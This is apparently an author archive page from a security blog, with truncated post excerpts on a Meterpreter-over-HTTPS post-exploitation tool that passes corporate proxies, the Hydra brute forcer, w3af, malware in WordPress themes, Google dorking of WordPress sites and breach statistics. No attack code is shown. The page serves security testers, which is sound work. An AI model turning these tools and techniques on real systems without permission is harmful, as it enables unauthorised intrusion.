HD Moore recently announced a new post exploitation tool offering Meterpreter sessions over HTTPS (HTTP) that will traverse the corporate proxy. Variations on this have been available previously but have been for a number of reasons been not so stable. Let’s first look at a common locked down Corporate Network. Then we will show how [...]
Archive by Author
Data Breaches Visualized
Nathan from Flowing data has put together an excellent graphical representation of the largest data breaches of all time. Data was sourced from Dataloss DB. Sony has been having all sorts of data breach problems lately — namely a million passwords from the Sony Pictures site, 77 million accounts from the PlayStation Network, and nearly [...]
Hydra 6.4 Password Brute Forcer
The latest version of Hydra has been released with some bug fixes. Problems noted in my post comparing hydra with ncrack and medusa have been addressed and after testing I can confirm these issues are no longer present. CHANGELOG for 6.4 ================= * Update SIP module to extract and use external IP addr return from [...]
Malware in WordPress Themes
Found an interesting article over at OttoPress with some in depth analysis of malware discovered in a theme on a less than reputable WordPress theme site. Seems there are some dodgey sites out there that have infected themes, both free ones and ripped off professional themes. Beware and check the reputation of your themes. It [...]
w3af web application security testing framework stable released
The latest version of w3af has been released and its a “stable” 1.0 release. To fire it up on Ubuntu only a couple of steps are required: Download the latest version from here: http://sourceforge.net/projects/w3af/files/ sudo apt-get install python-nltk python-soappy python-lxml python-svn python-scapy graphviz tar jxvf w3af-1.0-stable.tar.bz2 ./w3af_gui The first thing to notice is the shiny [...]
Google Dorking WordPress
WordPress is very popular and easy to install. This very accessibility makes it a juicy target for those wanting to collect compromised hosting accounts for serving malicious content, spamming, phishing sites, proxies and web shells. How prevalent is poor WordPress Security? Our Web Tech Report showed that application updates to WordPress are reasonable. Lets try [...]
New WordPress Version Released 3.1.3
Hot on the heels of the release of our new WordPress Security Scanner is a new update to wordpress. The release includes multiple security fixes and hardening. Update your installations now. Various security hardening by Alexander Concha. Taxonomy query hardening by John Lamansky. Prevent sniffing out user names of non-authors by using canonical redirects. Props [...]
Membership Benefits
Port scanning is one of the most common reconnaissance techniques used by testers to discover the vulnerabilities in the services listening at well-known ports.
Knowledge is Power
. 
